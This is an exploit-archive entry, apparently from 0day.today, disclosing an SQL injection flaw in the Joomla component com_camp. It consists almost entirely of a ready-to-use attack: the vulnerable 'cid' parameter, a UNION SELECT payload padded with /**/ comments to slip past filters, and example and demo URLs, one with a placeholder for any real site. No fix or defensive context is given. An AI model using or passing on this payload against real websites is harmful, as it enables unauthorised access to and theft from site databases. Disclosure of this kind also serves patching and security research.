id: 12250
date: 05/15/2010
title: Joomla Component com_camp SQL Injection Vulnerability
author: n/a
cves: 

=====================================================
Joomla Component com_camp SQL Injection Vulnerability
=====================================================

[!]#####################################################################################################[!]
  
[+] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_camp&task=show&cid=[SQL]
  
[+] ExploiT         :
  
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--
  
[+] Example         :
  
http://127.0.0.1/index.php?option=com_camp&task=show&cid=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--
 
[+] Demo            :
 
http://[site]/index.php?option=com_camp&task=show&cid=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--
 
   
[!]#####################################################################################################[!]



#  0day.today [2023-03-25]  #